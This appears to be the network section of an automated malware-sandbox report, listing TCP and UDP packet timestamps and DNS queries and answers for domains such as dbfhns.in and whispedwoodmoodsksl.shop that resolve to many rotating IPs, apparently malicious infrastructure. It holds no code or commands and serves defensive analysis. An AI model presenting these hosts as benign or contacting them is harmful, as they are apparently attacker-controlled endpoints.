                                                            May 27, 2024 15:24:54.285352945 CEST4435311337.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:54.285407066 CEST53113443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:54.285408020 CEST53113443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:54.286724091 CEST53113443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:54.286766052 CEST4435311337.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:54.701214075 CEST53114443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:54.701263905 CEST4435311437.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:54.701339960 CEST53114443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:54.701596975 CEST53114443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:54.701608896 CEST4435311437.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:55.393737078 CEST4435311437.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:55.393855095 CEST53114443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:55.394289017 CEST53114443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:55.394316912 CEST4435311437.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:55.394500017 CEST53114443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:55.394511938 CEST4435311437.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:56.160535097 CEST4435311437.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:56.160665035 CEST53114443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:56.160695076 CEST4435311437.27.34.12192.168.2.8
                                                            May 27, 2024 15:24:56.160763979 CEST53114443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:56.160818100 CEST53114443192.168.2.837.27.34.12
                                                            May 27, 2024 15:24:56.160856009 CEST4435311437.27.34.12192.168.2.8
                                                            May 27, 2024 15:25:21.583403111 CEST5311580192.168.2.8109.175.29.39
                                                            May 27, 2024 15:25:21.588444948 CEST8053115109.175.29.39192.168.2.8
                                                            May 27, 2024 15:25:21.588581085 CEST5311580192.168.2.8109.175.29.39
                                                            May 27, 2024 15:25:21.588725090 CEST5311580192.168.2.8109.175.29.39
                                                            May 27, 2024 15:25:21.588747025 CEST5311580192.168.2.8109.175.29.39
                                                            May 27, 2024 15:25:21.595552921 CEST8053115109.175.29.39192.168.2.8
                                                            May 27, 2024 15:25:21.596117020 CEST8053115109.175.29.39192.168.2.8
                                                            May 27, 2024 15:25:22.409034014 CEST8053115109.175.29.39192.168.2.8
                                                            May 27, 2024 15:25:22.409174919 CEST8053115109.175.29.39192.168.2.8
                                                            May 27, 2024 15:25:22.409235954 CEST5311580192.168.2.8109.175.29.39
                                                            May 27, 2024 15:25:22.409303904 CEST5311580192.168.2.8109.175.29.39
                                                            May 27, 2024 15:25:22.418194056 CEST8053115109.175.29.39192.168.2.8
                                                            May 27, 2024 15:25:27.091401100 CEST5311680192.168.2.8109.175.29.39
                                                            May 27, 2024 15:25:27.096537113 CEST8053116109.175.29.39192.168.2.8
                                                            May 27, 2024 15:25:27.096621037 CEST5311680192.168.2.8109.175.29.39
                                                            May 27, 2024 15:25:27.096781015 CEST5311680192.168.2.8109.175.29.39
                                                            May 27, 2024 15:25:27.096811056 CEST5311680192.168.2.8109.175.29.39
                                                            May 27, 2024 15:25:27.101607084 CEST8053116109.175.29.39192.168.2.8
                                                            May 27, 2024 15:25:27.101716995 CEST8053116109.175.29.39192.168.2.8
                                                            May 27, 2024 15:25:27.903228998 CEST8053116109.175.29.39192.168.2.8
                                                            May 27, 2024 15:25:27.903413057 CEST8053116109.175.29.39192.168.2.8
                                                            May 27, 2024 15:25:27.903476954 CEST5311680192.168.2.8109.175.29.39
                                                            May 27, 2024 15:25:27.903510094 CEST5311680192.168.2.8109.175.29.39
                                                            May 27, 2024 15:25:27.908391953 CEST8053116109.175.29.39192.168.2.8
                                                            May 27, 2024 15:25:32.316437006 CEST5311780192.168.2.8109.175.29.39
                                                            May 27, 2024 15:25:32.321358919 CEST8053117109.175.29.39192.168.2.8
                                                            May 27, 2024 15:25:32.321444988 CEST5311780192.168.2.8109.175.29.39
                                                            May 27, 2024 15:25:32.321607113 CEST5311780192.168.2.8109.175.29.39
                                                            May 27, 2024 15:25:32.321633101 CEST5311780192.168.2.8109.175.29.39
                                                            May 27, 2024 15:25:32.326463938 CEST8053117109.175.29.39192.168.2.8
                                                            May 27, 2024 15:25:32.326664925 CEST8053117109.175.29.39192.168.2.8
                                                            May 27, 2024 15:25:33.123317957 CEST8053117109.175.29.39192.168.2.8
                                                            May 27, 2024 15:25:33.124294043 CEST8053117109.175.29.39192.168.2.8
                                                            May 27, 2024 15:25:33.124352932 CEST5311780192.168.2.8109.175.29.39
                                                            May 27, 2024 15:25:33.124387026 CEST5311780192.168.2.8109.175.29.39
                                                            May 27, 2024 15:25:33.129342079 CEST8053117109.175.29.39192.168.2.8
                                                            May 27, 2024 15:25:39.363471031 CEST5311880192.168.2.8109.175.29.39
                                                            May 27, 2024 15:25:39.368361950 CEST8053118109.175.29.39192.168.2.8
                                                            May 27, 2024 15:25:39.368443012 CEST5311880192.168.2.8109.175.29.39
                                                            May 27, 2024 15:25:39.368552923 CEST5311880192.168.2.8109.175.29.39
                                                            May 27, 2024 15:25:39.368571997 CEST5311880192.168.2.8109.175.29.39
                                                            May 27, 2024 15:25:39.373378038 CEST8053118109.175.29.39192.168.2.8
                                                            May 27, 2024 15:25:39.373627901 CEST8053118109.175.29.39192.168.2.8
                                                            May 27, 2024 15:25:40.166234970 CEST8053118109.175.29.39192.168.2.8
                                                            May 27, 2024 15:25:40.167473078 CEST8053118109.175.29.39192.168.2.8
                                                            May 27, 2024 15:25:40.167546034 CEST5311880192.168.2.8109.175.29.39
                                                            May 27, 2024 15:25:40.172755003 CEST5311880192.168.2.8109.175.29.39
                                                            May 27, 2024 15:25:40.178411007 CEST8053118109.175.29.39192.168.2.8
                                                            May 27, 2024 15:25:44.346546888 CEST5311980192.168.2.8109.175.29.39
                                                            May 27, 2024 15:25:44.351743937 CEST8053119109.175.29.39192.168.2.8
                                                            May 27, 2024 15:25:44.351807117 CEST5311980192.168.2.8109.175.29.39
                                                            May 27, 2024 15:25:44.351947069 CEST5311980192.168.2.8109.175.29.39
                                                            May 27, 2024 15:25:44.351979971 CEST5311980192.168.2.8109.175.29.39
                                                            May 27, 2024 15:25:44.356950045 CEST8053119109.175.29.39192.168.2.8
                                                            May 27, 2024 15:25:44.356977940 CEST8053119109.175.29.39192.168.2.8
                                                            May 27, 2024 15:25:45.166171074 CEST8053119109.175.29.39192.168.2.8
                                                            May 27, 2024 15:25:45.166860104 CEST8053119109.175.29.39192.168.2.8
                                                            May 27, 2024 15:25:45.167052031 CEST5311980192.168.2.8109.175.29.39
                                                            May 27, 2024 15:25:45.167052031 CEST5311980192.168.2.8109.175.29.39
                                                            May 27, 2024 15:25:45.173845053 CEST8053119109.175.29.39192.168.2.8
                                                            May 27, 2024 15:25:49.157602072 CEST5312080192.168.2.8109.175.29.39
                                                            May 27, 2024 15:25:49.165304899 CEST8053120109.175.29.39192.168.2.8
                                                            May 27, 2024 15:25:49.165390968 CEST5312080192.168.2.8109.175.29.39
                                                            May 27, 2024 15:25:49.165527105 CEST5312080192.168.2.8109.175.29.39
                                                            May 27, 2024 15:25:49.165560961 CEST5312080192.168.2.8109.175.29.39
                                                            May 27, 2024 15:25:49.171458006 CEST8053120109.175.29.39192.168.2.8
                                                            May 27, 2024 15:25:49.171473980 CEST8053120109.175.29.39192.168.2.8
                                                            May 27, 2024 15:25:49.971698999 CEST8053120109.175.29.39192.168.2.8
                                                            May 27, 2024 15:25:49.972906113 CEST8053120109.175.29.39192.168.2.8
                                                            May 27, 2024 15:25:49.972986937 CEST5312080192.168.2.8109.175.29.39
                                                            May 27, 2024 15:25:49.975567102 CEST5312080192.168.2.8109.175.29.39
                                                            May 27, 2024 15:25:49.980448961 CEST8053120109.175.29.39192.168.2.8
                                                            May 27, 2024 15:25:56.334589958 CEST5312180192.168.2.8109.175.29.39
                                                            May 27, 2024 15:25:56.339662075 CEST8053121109.175.29.39192.168.2.8
                                                            May 27, 2024 15:25:56.339798927 CEST5312180192.168.2.8109.175.29.39
                                                            May 27, 2024 15:25:56.339915991 CEST5312180192.168.2.8109.175.29.39
                                                            May 27, 2024 15:25:56.339953899 CEST5312180192.168.2.8109.175.29.39
                                                            May 27, 2024 15:25:56.344999075 CEST8053121109.175.29.39192.168.2.8
                                                            May 27, 2024 15:25:56.345257044 CEST8053121109.175.29.39192.168.2.8
                                                            May 27, 2024 15:25:57.146100044 CEST8053121109.175.29.39192.168.2.8
                                                            May 27, 2024 15:25:57.146401882 CEST8053121109.175.29.39192.168.2.8
                                                            May 27, 2024 15:25:57.146574974 CEST5312180192.168.2.8109.175.29.39
                                                            May 27, 2024 15:25:57.146574974 CEST5312180192.168.2.8109.175.29.39
                                                            May 27, 2024 15:25:57.151515961 CEST8053121109.175.29.39192.168.2.8
                                                            May 27, 2024 15:26:00.852902889 CEST5312280192.168.2.8109.175.29.39
                                                            May 27, 2024 15:26:00.859647989 CEST8053122109.175.29.39192.168.2.8
                                                            May 27, 2024 15:26:00.859764099 CEST5312280192.168.2.8109.175.29.39
                                                            May 27, 2024 15:26:00.859899044 CEST5312280192.168.2.8109.175.29.39
                                                            May 27, 2024 15:26:00.859910965 CEST5312280192.168.2.8109.175.29.39
                                                            May 27, 2024 15:26:00.866148949 CEST8053122109.175.29.39192.168.2.8
                                                            May 27, 2024 15:26:00.867723942 CEST8053122109.175.29.39192.168.2.8
                                                            May 27, 2024 15:26:01.661735058 CEST8053122109.175.29.39192.168.2.8
                                                            May 27, 2024 15:26:01.662410021 CEST8053122109.175.29.39192.168.2.8
                                                            May 27, 2024 15:26:01.662489891 CEST5312280192.168.2.8109.175.29.39
                                                            May 27, 2024 15:26:01.662532091 CEST5312280192.168.2.8109.175.29.39
                                                            May 27, 2024 15:26:01.672799110 CEST8053122109.175.29.39192.168.2.8
                                                            May 27, 2024 15:26:05.870048046 CEST5312380192.168.2.8109.175.29.39
                                                            May 27, 2024 15:26:05.875062943 CEST8053123109.175.29.39192.168.2.8
                                                            May 27, 2024 15:26:05.875170946 CEST5312380192.168.2.8109.175.29.39
                                                            May 27, 2024 15:26:05.875359058 CEST5312380192.168.2.8109.175.29.39
                                                            May 27, 2024 15:26:05.875405073 CEST5312380192.168.2.8109.175.29.39
                                                            May 27, 2024 15:26:05.882040977 CEST8053123109.175.29.39192.168.2.8
                                                            May 27, 2024 15:26:05.882096052 CEST8053123109.175.29.39192.168.2.8
                                                            May 27, 2024 15:26:06.708801031 CEST8053123109.175.29.39192.168.2.8
                                                            May 27, 2024 15:26:06.709378958 CEST8053123109.175.29.39192.168.2.8
                                                            May 27, 2024 15:26:06.709480047 CEST5312380192.168.2.8109.175.29.39
                                                            May 27, 2024 15:26:06.721813917 CEST5312380192.168.2.8109.175.29.39
                                                            May 27, 2024 15:26:06.730690002 CEST8053123109.175.29.39192.168.2.8
                                                            May 27, 2024 15:26:13.418833017 CEST5312480192.168.2.8190.147.128.172
                                                            May 27, 2024 15:26:13.574537992 CEST8053124190.147.128.172192.168.2.8
                                                            May 27, 2024 15:26:13.574760914 CEST5312480192.168.2.8190.147.128.172
                                                            May 27, 2024 15:26:13.597836018 CEST5312480192.168.2.8190.147.128.172
                                                            May 27, 2024 15:26:13.597836018 CEST5312480192.168.2.8190.147.128.172
                                                            May 27, 2024 15:26:13.602771044 CEST8053124190.147.128.172192.168.2.8
                                                            May 27, 2024 15:26:13.602809906 CEST8053124190.147.128.172192.168.2.8
                                                            May 27, 2024 15:26:14.643624067 CEST8053124190.147.128.172192.168.2.8
                                                            May 27, 2024 15:26:14.651999950 CEST8053124190.147.128.172192.168.2.8
                                                            May 27, 2024 15:26:14.652210951 CEST5312480192.168.2.8190.147.128.172
                                                            May 27, 2024 15:26:14.652210951 CEST5312480192.168.2.8190.147.128.172
                                                            May 27, 2024 15:26:14.657155037 CEST8053124190.147.128.172192.168.2.8
                                                            May 27, 2024 15:26:19.082314968 CEST5312580192.168.2.8190.147.128.172
                                                            May 27, 2024 15:26:19.087230921 CEST8053125190.147.128.172192.168.2.8
                                                            May 27, 2024 15:26:19.087351084 CEST5312580192.168.2.8190.147.128.172
                                                            May 27, 2024 15:26:19.087512970 CEST5312580192.168.2.8190.147.128.172
                                                            May 27, 2024 15:26:19.087548971 CEST5312580192.168.2.8190.147.128.172
                                                            May 27, 2024 15:26:19.093101025 CEST8053125190.147.128.172192.168.2.8
                                                            May 27, 2024 15:26:19.093147993 CEST8053125190.147.128.172192.168.2.8
                                                            May 27, 2024 15:26:20.152513981 CEST8053125190.147.128.172192.168.2.8
                                                            May 27, 2024 15:26:20.152793884 CEST8053125190.147.128.172192.168.2.8
                                                            May 27, 2024 15:26:20.152847052 CEST5312580192.168.2.8190.147.128.172
                                                            May 27, 2024 15:26:20.152880907 CEST5312580192.168.2.8190.147.128.172
                                                            May 27, 2024 15:26:20.157732010 CEST8053125190.147.128.172192.168.2.8
                                                            May 27, 2024 15:26:24.240665913 CEST5312680192.168.2.8190.147.128.172
                                                            May 27, 2024 15:26:24.246427059 CEST8053126190.147.128.172192.168.2.8
                                                            May 27, 2024 15:26:24.246531010 CEST5312680192.168.2.8190.147.128.172
                                                            May 27, 2024 15:26:24.246699095 CEST5312680192.168.2.8190.147.128.172
                                                            May 27, 2024 15:26:24.246716022 CEST5312680192.168.2.8190.147.128.172
                                                            May 27, 2024 15:26:24.252619982 CEST8053126190.147.128.172192.168.2.8
                                                            May 27, 2024 15:26:24.252917051 CEST8053126190.147.128.172192.168.2.8
                                                            May 27, 2024 15:26:25.384758949 CEST8053126190.147.128.172192.168.2.8
                                                            May 27, 2024 15:26:25.385688066 CEST8053126190.147.128.172192.168.2.8
                                                            May 27, 2024 15:26:25.385756969 CEST5312680192.168.2.8190.147.128.172
                                                            May 27, 2024 15:26:25.385801077 CEST5312680192.168.2.8190.147.128.172
                                                            May 27, 2024 15:26:25.391699076 CEST8053126190.147.128.172192.168.2.8
                                                            May 27, 2024 15:26:32.060360909 CEST5312780192.168.2.8190.147.128.172
                                                            May 27, 2024 15:26:32.065231085 CEST8053127190.147.128.172192.168.2.8
                                                            May 27, 2024 15:26:32.065289974 CEST5312780192.168.2.8190.147.128.172
                                                            May 27, 2024 15:26:32.065397024 CEST5312780192.168.2.8190.147.128.172
                                                            May 27, 2024 15:26:32.065406084 CEST5312780192.168.2.8190.147.128.172
                                                            May 27, 2024 15:26:32.070632935 CEST8053127190.147.128.172192.168.2.8
                                                            May 27, 2024 15:26:32.070729017 CEST8053127190.147.128.172192.168.2.8
                                                            May 27, 2024 15:26:33.151061058 CEST8053127190.147.128.172192.168.2.8
                                                            May 27, 2024 15:26:33.160365105 CEST8053127190.147.128.172192.168.2.8
                                                            May 27, 2024 15:26:33.160423994 CEST5312780192.168.2.8190.147.128.172
                                                            May 27, 2024 15:26:33.160486937 CEST5312780192.168.2.8190.147.128.172
                                                            May 27, 2024 15:26:33.165266037 CEST8053127190.147.128.172192.168.2.8
                                                            May 27, 2024 15:26:37.374064922 CEST5312880192.168.2.8190.147.128.172
                                                            May 27, 2024 15:26:37.380240917 CEST8053128190.147.128.172192.168.2.8
                                                            May 27, 2024 15:26:37.380363941 CEST5312880192.168.2.8190.147.128.172
                                                            May 27, 2024 15:26:37.380507946 CEST5312880192.168.2.8190.147.128.172
                                                            May 27, 2024 15:26:37.380525112 CEST5312880192.168.2.8190.147.128.172
                                                            May 27, 2024 15:26:37.386850119 CEST8053128190.147.128.172192.168.2.8
                                                            May 27, 2024 15:26:37.387001991 CEST8053128190.147.128.172192.168.2.8
                                                            May 27, 2024 15:26:38.479953051 CEST8053128190.147.128.172192.168.2.8
                                                            May 27, 2024 15:26:38.485810995 CEST8053128190.147.128.172192.168.2.8
                                                            May 27, 2024 15:26:38.485917091 CEST5312880192.168.2.8190.147.128.172
                                                            May 27, 2024 15:26:38.485954046 CEST5312880192.168.2.8190.147.128.172
                                                            May 27, 2024 15:26:38.493494034 CEST8053128190.147.128.172192.168.2.8
                                                            May 27, 2024 15:26:42.778840065 CEST5312980192.168.2.8190.147.128.172
                                                            May 27, 2024 15:26:42.784240961 CEST8053129190.147.128.172192.168.2.8
                                                            May 27, 2024 15:26:42.784343004 CEST5312980192.168.2.8190.147.128.172
                                                            May 27, 2024 15:26:42.784524918 CEST5312980192.168.2.8190.147.128.172
                                                            May 27, 2024 15:26:42.784569025 CEST5312980192.168.2.8190.147.128.172
                                                            May 27, 2024 15:26:42.789813995 CEST8053129190.147.128.172192.168.2.8
                                                            May 27, 2024 15:26:42.789921045 CEST8053129190.147.128.172192.168.2.8
                                                            May 27, 2024 15:26:43.886503935 CEST8053129190.147.128.172192.168.2.8
                                                            May 27, 2024 15:26:43.886533976 CEST8053129190.147.128.172192.168.2.8
                                                            May 27, 2024 15:26:43.886765003 CEST5312980192.168.2.8190.147.128.172
                                                            May 27, 2024 15:26:43.886868000 CEST5312980192.168.2.8190.147.128.172
                                                            May 27, 2024 15:26:43.894409895 CEST8053129190.147.128.172192.168.2.8
                                                            May 27, 2024 15:26:50.098692894 CEST5313080192.168.2.8190.147.128.172
                                                            May 27, 2024 15:26:50.105504036 CEST8053130190.147.128.172192.168.2.8
                                                            May 27, 2024 15:26:50.105629921 CEST5313080192.168.2.8190.147.128.172
                                                            May 27, 2024 15:26:50.105824947 CEST5313080192.168.2.8190.147.128.172
                                                            May 27, 2024 15:26:50.105861902 CEST5313080192.168.2.8190.147.128.172
                                                            May 27, 2024 15:26:50.112771034 CEST8053130190.147.128.172192.168.2.8
                                                            May 27, 2024 15:26:50.114932060 CEST8053130190.147.128.172192.168.2.8
                                                            May 27, 2024 15:26:51.223261118 CEST8053130190.147.128.172192.168.2.8
                                                            May 27, 2024 15:26:51.223383904 CEST8053130190.147.128.172192.168.2.8
                                                            May 27, 2024 15:26:51.223543882 CEST5313080192.168.2.8190.147.128.172
                                                            May 27, 2024 15:26:51.229331970 CEST5313080192.168.2.8190.147.128.172
                                                            May 27, 2024 15:26:51.234729052 CEST8053130190.147.128.172192.168.2.8
                                                            May 27, 2024 15:26:55.390728951 CEST5313180192.168.2.8190.147.128.172
                                                            May 27, 2024 15:26:55.402677059 CEST8053131190.147.128.172192.168.2.8
                                                            May 27, 2024 15:26:55.402781010 CEST5313180192.168.2.8190.147.128.172
                                                            May 27, 2024 15:26:55.402930021 CEST5313180192.168.2.8190.147.128.172
                                                            May 27, 2024 15:26:55.402960062 CEST5313180192.168.2.8190.147.128.172
                                                            May 27, 2024 15:26:55.409435987 CEST8053131190.147.128.172192.168.2.8
                                                            May 27, 2024 15:26:55.409607887 CEST8053131190.147.128.172192.168.2.8
                                                            May 27, 2024 15:26:56.507198095 CEST8053131190.147.128.172192.168.2.8
                                                            May 27, 2024 15:26:56.512510061 CEST8053131190.147.128.172192.168.2.8
                                                            May 27, 2024 15:26:56.512619019 CEST5313180192.168.2.8190.147.128.172
                                                            May 27, 2024 15:26:56.512691021 CEST5313180192.168.2.8190.147.128.172
                                                            May 27, 2024 15:26:56.517848015 CEST8053131190.147.128.172192.168.2.8
                                                            May 27, 2024 15:27:00.576960087 CEST5313280192.168.2.8190.147.128.172
                                                            May 27, 2024 15:27:00.582132101 CEST8053132190.147.128.172192.168.2.8
                                                            May 27, 2024 15:27:00.582201004 CEST5313280192.168.2.8190.147.128.172
                                                            May 27, 2024 15:27:00.582448006 CEST5313280192.168.2.8190.147.128.172
                                                            May 27, 2024 15:27:00.582463980 CEST5313280192.168.2.8190.147.128.172
                                                            May 27, 2024 15:27:00.587372065 CEST8053132190.147.128.172192.168.2.8
                                                            May 27, 2024 15:27:00.587599039 CEST8053132190.147.128.172192.168.2.8
                                                            May 27, 2024 15:27:01.657985926 CEST8053132190.147.128.172192.168.2.8
                                                            May 27, 2024 15:27:01.666512966 CEST8053132190.147.128.172192.168.2.8
                                                            May 27, 2024 15:27:01.666771889 CEST5313280192.168.2.8190.147.128.172
                                                            May 27, 2024 15:27:01.666771889 CEST5313280192.168.2.8190.147.128.172
                                                            May 27, 2024 15:27:01.674902916 CEST8053132190.147.128.172192.168.2.8

                                                            UDP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            May 27, 2024 15:23:24.003853083 CEST6174253192.168.2.81.1.1.1
                                                            May 27, 2024 15:23:24.990876913 CEST6174253192.168.2.81.1.1.1
                                                            May 27, 2024 15:23:26.006493092 CEST6174253192.168.2.81.1.1.1
                                                            May 27, 2024 15:23:26.252218008 CEST53617421.1.1.1192.168.2.8
                                                            May 27, 2024 15:23:26.252244949 CEST53617421.1.1.1192.168.2.8
                                                            May 27, 2024 15:23:26.252255917 CEST53617421.1.1.1192.168.2.8
                                                            May 27, 2024 15:23:32.092277050 CEST5353221162.159.36.2192.168.2.8
                                                            May 27, 2024 15:23:33.088190079 CEST5854253192.168.2.81.1.1.1
                                                            May 27, 2024 15:23:33.101793051 CEST53585421.1.1.1192.168.2.8
                                                            May 27, 2024 15:23:35.625284910 CEST5092053192.168.2.81.1.1.1
                                                            May 27, 2024 15:23:36.361208916 CEST5139753192.168.2.81.1.1.1
                                                            May 27, 2024 15:23:36.384690046 CEST53513971.1.1.1192.168.2.8
                                                            May 27, 2024 15:23:36.631695032 CEST5092053192.168.2.81.1.1.1
                                                            May 27, 2024 15:23:37.632857084 CEST5092053192.168.2.81.1.1.1
                                                            May 27, 2024 15:23:37.973241091 CEST53509201.1.1.1192.168.2.8
                                                            May 27, 2024 15:23:37.973285913 CEST53509201.1.1.1192.168.2.8
                                                            May 27, 2024 15:23:37.975954056 CEST53509201.1.1.1192.168.2.8
                                                            May 27, 2024 15:24:09.998497009 CEST6216153192.168.2.81.1.1.1
                                                            May 27, 2024 15:24:10.009982109 CEST53621611.1.1.1192.168.2.8
                                                            May 27, 2024 15:26:11.158740997 CEST5005653192.168.2.81.1.1.1
                                                            May 27, 2024 15:26:12.610732079 CEST5005653192.168.2.81.1.1.1
                                                            May 27, 2024 15:26:13.276562929 CEST53500561.1.1.1192.168.2.8
                                                            May 27, 2024 15:26:13.276607037 CEST53500561.1.1.1192.168.2.8

                                                            DNS Queries

                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                            May 27, 2024 15:23:24.003853083 CEST192.168.2.81.1.1.10xd31cStandard query (0)dbfhns.inA (IP address)IN (0x0001)false
                                                            May 27, 2024 15:23:24.990876913 CEST192.168.2.81.1.1.10xd31cStandard query (0)dbfhns.inA (IP address)IN (0x0001)false
                                                            May 27, 2024 15:23:26.006493092 CEST192.168.2.81.1.1.10xd31cStandard query (0)dbfhns.inA (IP address)IN (0x0001)false
                                                            May 27, 2024 15:23:33.088190079 CEST192.168.2.81.1.1.10xfed4Standard query (0)15.164.165.52.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                            May 27, 2024 15:23:35.625284910 CEST192.168.2.81.1.1.10xfeb0Standard query (0)dbfhns.inA (IP address)IN (0x0001)false
                                                            May 27, 2024 15:23:36.361208916 CEST192.168.2.81.1.1.10x8342Standard query (0)whispedwoodmoodsksl.shopA (IP address)IN (0x0001)false
                                                            May 27, 2024 15:23:36.631695032 CEST192.168.2.81.1.1.10xfeb0Standard query (0)dbfhns.inA (IP address)IN (0x0001)false
                                                            May 27, 2024 15:23:37.632857084 CEST192.168.2.81.1.1.10xfeb0Standard query (0)dbfhns.inA (IP address)IN (0x0001)false
                                                            May 27, 2024 15:24:09.998497009 CEST192.168.2.81.1.1.10x6ac8Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                            May 27, 2024 15:26:11.158740997 CEST192.168.2.81.1.1.10xec1dStandard query (0)dbfhns.inA (IP address)IN (0x0001)false
                                                            May 27, 2024 15:26:12.610732079 CEST192.168.2.81.1.1.10xec1dStandard query (0)dbfhns.inA (IP address)IN (0x0001)false

                                                            DNS Answers

                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                            May 27, 2024 15:23:26.252218008 CEST1.1.1.1192.168.2.80xd31cNo error (0)dbfhns.in190.13.174.94A (IP address)IN (0x0001)false
                                                            May 27, 2024 15:23:26.252218008 CEST1.1.1.1192.168.2.80xd31cNo error (0)dbfhns.in181.123.219.23A (IP address)IN (0x0001)false
                                                            May 27, 2024 15:23:26.252218008 CEST1.1.1.1192.168.2.80xd31cNo error (0)dbfhns.in189.163.126.89A (IP address)IN (0x0001)false
                                                            May 27, 2024 15:23:26.252218008 CEST1.1.1.1192.168.2.80xd31cNo error (0)dbfhns.in187.170.192.109A (IP address)IN (0x0001)false
                                                            May 27, 2024 15:23:26.252218008 CEST1.1.1.1192.168.2.80xd31cNo error (0)dbfhns.in190.147.128.172A (IP address)IN (0x0001)false
                                                            May 27, 2024 15:23:26.252218008 CEST1.1.1.1192.168.2.80xd31cNo error (0)dbfhns.in194.93.26.201A (IP address)IN (0x0001)false
                                                            May 27, 2024 15:23:26.252218008 CEST1.1.1.1192.168.2.80xd31cNo error (0)dbfhns.in187.143.58.5A (IP address)IN (0x0001)false
                                                            May 27, 2024 15:23:26.252218008 CEST1.1.1.1192.168.2.80xd31cNo error (0)dbfhns.in211.171.233.129A (IP address)IN (0x0001)false
                                                            May 27, 2024 15:23:26.252218008 CEST1.1.1.1192.168.2.80xd31cNo error (0)dbfhns.in109.175.29.39A (IP address)IN (0x0001)false
                                                            May 27, 2024 15:23:26.252218008 CEST1.1.1.1192.168.2.80xd31cNo error (0)dbfhns.in189.245.6.57A (IP address)IN (0x0001)false
                                                            May 27, 2024 15:23:26.252244949 CEST1.1.1.1192.168.2.80xd31cNo error (0)dbfhns.in190.13.174.94A (IP address)IN (0x0001)false
                                                            May 27, 2024 15:23:26.252244949 CEST1.1.1.1192.168.2.80xd31cNo error (0)dbfhns.in181.123.219.23A (IP address)IN (0x0001)false
                                                            May 27, 2024 15:23:26.252244949 CEST1.1.1.1192.168.2.80xd31cNo error (0)dbfhns.in189.163.126.89A (IP address)IN (0x0001)false
                                                            May 27, 2024 15:23:26.252244949 CEST1.1.1.1192.168.2.80xd31cNo error (0)dbfhns.in187.170.192.109A (IP address)IN (0x0001)false
                                                            May 27, 2024 15:23:26.252244949 CEST1.1.1.1192.168.2.80xd31cNo error (0)dbfhns.in190.147.128.172A (IP address)IN (0x0001)false
                                                            May 27, 2024 15:23:26.252244949 CEST1.1.1.1192.168.2.80xd31cNo error (0)dbfhns.in194.93.26.201A (IP address)IN (0x0001)false
                                                            May 27, 2024 15:23:26.252244949 CEST1.1.1.1192.168.2.80xd31cNo error (0)dbfhns.in187.143.58.5A (IP address)IN (0x0001)false
                                                            May 27, 2024 15:23:26.252244949 CEST1.1.1.1192.168.2.80xd31cNo error (0)dbfhns.in211.171.233.129A (IP address)IN (0x0001)false
                                                            May 27, 2024 15:23:26.252244949 CEST1.1.1.1192.168.2.80xd31cNo error (0)dbfhns.in109.175.29.39A (IP address)IN (0x0001)false
                                                            May 27, 2024 15:23:26.252244949 CEST1.1.1.1192.168.2.80xd31cNo error (0)dbfhns.in189.245.6.57A (IP address)IN (0x0001)false
                                                            May 27, 2024 15:23:26.252255917 CEST1.1.1.1192.168.2.80xd31cNo error (0)dbfhns.in190.13.174.94A (IP address)IN (0x0001)false
                                                            May 27, 2024 15:23:26.252255917 CEST1.1.1.1192.168.2.80xd31cNo error (0)dbfhns.in181.123.219.23A (IP address)IN (0x0001)false
                                                            May 27, 2024 15:23:26.252255917 CEST1.1.1.1192.168.2.80xd31cNo error (0)dbfhns.in189.163.126.89A (IP address)IN (0x0001)false
                                                            May 27, 2024 15:23:26.252255917 CEST1.1.1.1192.168.2.80xd31cNo error (0)dbfhns.in187.170.192.109A (IP address)IN (0x0001)false
                                                            May 27, 2024 15:23:26.252255917 CEST1.1.1.1192.168.2.80xd31cNo error (0)dbfhns.in190.147.128.172A (IP address)IN (0x0001)false
                                                            May 27, 2024 15:23:26.252255917 CEST1.1.1.1192.168.2.80xd31cNo error (0)dbfhns.in194.93.26.201A (IP address)IN (0x0001)false
                                                            May 27, 2024 15:23:26.252255917 CEST1.1.1.1192.168.2.80xd31cNo error (0)dbfhns.in187.143.58.5A (IP address)IN (0x0001)false
                                                            May 27, 2024 15:23:26.252255917 CEST1.1.1.1192.168.2.80xd31cNo error (0)dbfhns.in211.171.233.129A (IP address)IN (0x0001)false
                                                            May 27, 2024 15:23:26.252255917 CEST1.1.1.1192.168.2.80xd31cNo error (0)dbfhns.in109.175.29.39A (IP address)IN (0x0001)false
                                                            May 27, 2024 15:23:26.252255917 CEST1.1.1.1192.168.2.80xd31cNo error (0)dbfhns.in189.245.6.57A (IP address)IN (0x0001)false
                                                            May 27, 2024 15:23:33.101793051 CEST1.1.1.1192.168.2.80xfed4Name error (3)15.164.165.52.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                            May 27, 2024 15:23:36.384690046 CEST1.1.1.1192.168.2.80x8342No error (0)whispedwoodmoodsksl.shop188.114.96.3A (IP address)IN (0x0001)false
                                                            May 27, 2024 15:23:36.384690046 CEST1.1.1.1192.168.2.80x8342No error (0)whispedwoodmoodsksl.shop188.114.97.3A (IP address)IN (0x0001)false
                                                            May 27, 2024 15:23:37.973241091 CEST1.1.1.1192.168.2.80xfeb0No error (0)dbfhns.in109.175.29.39A (IP address)IN (0x0001)false
                                                            May 27, 2024 15:23:37.973241091 CEST1.1.1.1192.168.2.80xfeb0No error (0)dbfhns.in189.245.6.57A (IP address)IN (0x0001)false
